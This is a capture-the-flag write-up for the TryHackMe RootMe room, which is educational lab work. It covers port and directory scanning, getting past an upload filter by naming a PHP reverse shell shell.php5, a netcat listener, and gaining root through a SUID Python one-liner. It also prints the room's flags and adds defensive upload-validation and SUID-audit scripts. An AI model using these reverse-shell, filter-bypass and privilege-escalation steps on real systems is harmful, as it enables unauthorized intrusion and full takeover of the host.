Challenges: RootMe (TryHackMe)

Jebitok
3 min read

This article will cover the RootMe write-up under Challenges on THM.

Deploy the machine

Connect to the TryHackMe network and deploy the machine. If you don't know how to do this, complete the OpenVPN room first.

Reconnaissance

First, let's get information about the target.

Answer the questions below

  1. Scan the machine, how many ports are open? 2

    nmap -p- <ip_address>

  2. What version of Apache is running? 2.4.29

    curl http://<ip_address>/http

    Requesting a path that does not exist returns Apache's default 404 page, and its signature line at the bottom names the server version. Other ways to find the version of Apache running:

    curl -I http://<ip_address>

    nmap -sV -p 22,80 <ip_address>

    nikto -h http://<ip_address>

  3. What service is running on port 22? ssh

  4. Find directories on the web server using the GoBuster tool (gobuster expects a full URL, not a bare IP).

    gobuster dir -u http://<ip_address> -w /usr/share/wordlists/dirb/common.txt

  5. What is the hidden directory? /panel/

    To also check for files with common extensions:

    gobuster dir -u http://<ip_address> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Answer the questions below

user.txt - The hint: Search for "file upload bypass" and "PHP reverse shell".

THM{y0u_g0t_a_sh3ll}

  • Copy /usr/share/webshells/php/php-reverse-shell.php (shipped with Kali) into a new file with a PHP extension the upload filter does not block, e.g. shell.php5:

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php5

  • Edit shell.php5 and set the $ip and $port variables near the top to your attack box IP and the port you are about to listen on.

  • Start a listener in a second tab:

$ nc -lvnp 4444

  • Visit http://<ip_address>/panel and upload shell.php5.

  • Uploading a .php file pops an alert saying "PHP not allowed". A .png or .jpg file uploads successfully, but it is served as an image and never executes, so no shell comes back. The filter only rejects the literal .php extension, while Apache still hands .php5 to the PHP interpreter, so the .php5 copy is accepted and runs. Request the uploaded file's URL so the server executes it.

  • Check the tab running nc -lvnp 4444: the reverse shell has connected. Locate and read user.txt:

$ find / -type f -name user.txt 2> /dev/null

$ cat /var/www/user.txt
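The reason the .php5 trick works is an extension blacklist that checks for less than the web server executes. The following is an added example, not code from the RootMe room or the original write-up: it models a weak blacklist check of the kind the "PHP not allowed" alert suggests, beside the allowlist check a reviewer would ask for (single extension, image types only, content matching the type's magic bytes). The handler extension set, the allowlist and the sample uploads are all assumptions for illustration, not the room's configuration.

```python
"""Added example, not code from the RootMe room or the original write-up.

Models two ways the /panel upload form could vet a filename. The weak check
refuses only a literal ".php" suffix, while Apache's PHP handler is usually
configured for several extensions (.phtml, .php5, ...), so anything the
handler also matches slips past. The strict check is the allowlist a
reviewer would ask for. Every extension and magic-byte list below is an
assumption for illustration, not the room's config.
"""
import posixpath

# Extensions the PHP handler is assumed to execute (assumption; on a real
# host read /etc/apache2/mods-enabled/php*.conf).
PHP_HANDLER_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar"}

# What the upload form is meant to accept, and the leading bytes of each type.
IMAGE_ALLOWLIST = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """Blacklist: refuse only a literal .php suffix.
    Returns True when the upload would be accepted."""
    return not filename.lower().endswith(".php")


def would_execute(stored_name: str) -> bool:
    """Would Apache hand a file stored under this name to PHP? Only the final
    extension is considered; some AddHandler setups also act on inner
    extensions (shell.php.png), which this model does not cover."""
    ext = stored_name.rsplit(".", 1)[-1].lower() if "." in stored_name else ""
    return ext in PHP_HANDLER_EXTS


def safe_name(filename: str, content: bytes):
    """Allowlist check. Returns the sanitised basename to store the upload
    under, or None to reject it: no path component, nothing after a NUL,
    exactly one extension, extension in the image allowlist, and content
    starting with that type's magic bytes."""
    base = posixpath.basename(filename.replace("\\", "/"))
    base = base.split("\x00", 1)[0]          # "cat.png\0.php" -> "cat.png"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:      # no ext, double ext, or dotfile
        return None
    stem, ext = parts
    if ext not in IMAGE_ALLOWLIST or not content.startswith(MAGIC[ext]):
        return None
    return f"{stem}.{ext}"


def evaluate(filename: str, content: bytes) -> dict:
    """Run both checks on one upload so the difference is visible side by side."""
    return {
        "weak_accepts": weak_check(filename),
        "strict_name": safe_name(filename, content),
        "php_executes_if_stored_as_is": would_execute(filename),
    }


if __name__ == "__main__":
    # Constructed samples: a PHP payload under several names, plus a real-looking PNG.
    php_payload = b"<?php /* reverse shell body */ ?>"
    png_payload = MAGIC["png"] + b"\x00" * 16
    for name, data in [
        ("shell.php", php_payload),
        ("shell.php5", php_payload),
        ("shell.PhP5", php_payload),
        ("shell.php.png", php_payload),
        ("cat.png", png_payload),
        ("cat.png\x00.php", png_payload),
    ]:
        print(repr(name), evaluate(name, data))
```

Run it and compare the rows: shell.php5 passes the weak check and would be executed, but gets no stored name from the strict check; cat.png passes both; the NUL-byte and double-extension variants are cut down or refused before anything reaches disk.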

Privilege escalation

Now that we have a shell, let's escalate our privileges to root.

Answer the questions below

  1. Search for files with SUID permission, which file is weird? /usr/bin/python

find / -user root -perm /4000 2> /dev/null

    A root-owned Python interpreter with the SUID bit set is not normal: anything it executes runs with root's effective UID.

  2. Find a form to escalate your privileges.
    Visit GTFOBins under SUID - Python (https://gtfobins.github.io/gtfobins/python/).

  3. root.txt THM{pr1v1l3g3_3sc4l4t10n}

    First upgrade to an interactive TTY:

    $ python3 -c 'import pty; pty.spawn("/bin/bash")'

    www-data@rootme:/$ cd /tmp

    www-data@rootme:/tmp$ cp /usr/bin/python ./python

    www-data@rootme:/tmp$ chmod u+s python

    The copy to /tmp and the chmod are not what grants root: a copy made by www-data is owned by www-data, so its SUID bit only gives back www-data's own privileges. The escalation comes from the original root-owned /usr/bin/python. The -p flag tells sh to keep the elevated effective UID instead of dropping it:

    www-data@rootme:/tmp$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

    # whoami

    # cat /root/root.txt
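The find command above lists every root-owned SUID file; the question is which one does not belong. Below is an added example, not part of the original write-up, that does the same walk in Python and then triages the result: it sorts each SUID binary into an expected baseline, a GTFOBins-style list of interpreters and utilities that can hand back a shell without dropping the effective UID, and everything else. Both name sets and the constructed sample tree are illustrative assumptions, not an exhaustive baseline.

```python
"""Added example, not part of the original write-up.

Python equivalent of the page's `find / -user root -perm /4000` step plus the
triage the question asks for: which SUID binary is out of place? It walks a
tree, keeps regular files with the setuid bit (root-owned only by default)
and splits them into an expected baseline, a GTFOBins-style list of names
with a SUID shell escape, and everything else. Both name sets are
illustrative assumptions, not an exhaustive baseline.
"""
import os
import stat
import tempfile

# Root-owned SUID binaries normally present on a stock Ubuntu install (assumption).
EXPECTED = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd",
            "newgrp", "ping", "pkexec", "fusermount", "ssh-keysign"}

# Names with a SUID shell escape on GTFOBins (subset, assumption).
DANGEROUS = {"python", "perl", "php", "ruby", "find", "vim", "bash", "env",
             "awk", "node", "lua"}

# Pseudo filesystems that never hold real binaries.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/", owner_uid=0):
    """Return sorted paths of regular files under root with the setuid bit.
    owner_uid=None disables the owner filter."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                      # unreadable, like 2>/dev/null
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is None or st.st_uid == owner_uid:
                found.append(path)
    return sorted(found)


def classify(paths):
    """Split SUID paths into expected, dangerous and unknown by basename.
    A trailing version (python2.7, python3) is stripped before matching."""
    report = {"expected": [], "dangerous": [], "unknown": []}
    for path in paths:
        base = os.path.basename(path)
        stem = base.rstrip("0123456789.")
        if base in DANGEROUS or stem in DANGEROUS:
            report["dangerous"].append(path)
        elif base in EXPECTED:
            report["expected"].append(path)
        else:
            report["unknown"].append(path)
    return report


def demo():
    """Constructed sample tree: a fake SUID python and passwd plus a plain ls.
    The files belong to the current user, so the owner filter is disabled."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    for rel, mode in [("usr/bin/python", 0o4755), ("usr/bin/passwd", 0o4755),
                      ("usr/bin/ls", 0o755)]:
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(path, mode)
    report = classify(find_suid(base, owner_uid=None))
    return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print("sample tree:", demo())
    for kind, paths in classify(find_suid("/")).items():
        print(f"{kind}: {paths}")
```

On the RootMe box the "dangerous" bucket is what answers the question; anything landing in "unknown" deserves a look at GTFOBins as well, since the list here is deliberately short.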

Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges.

Written by Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.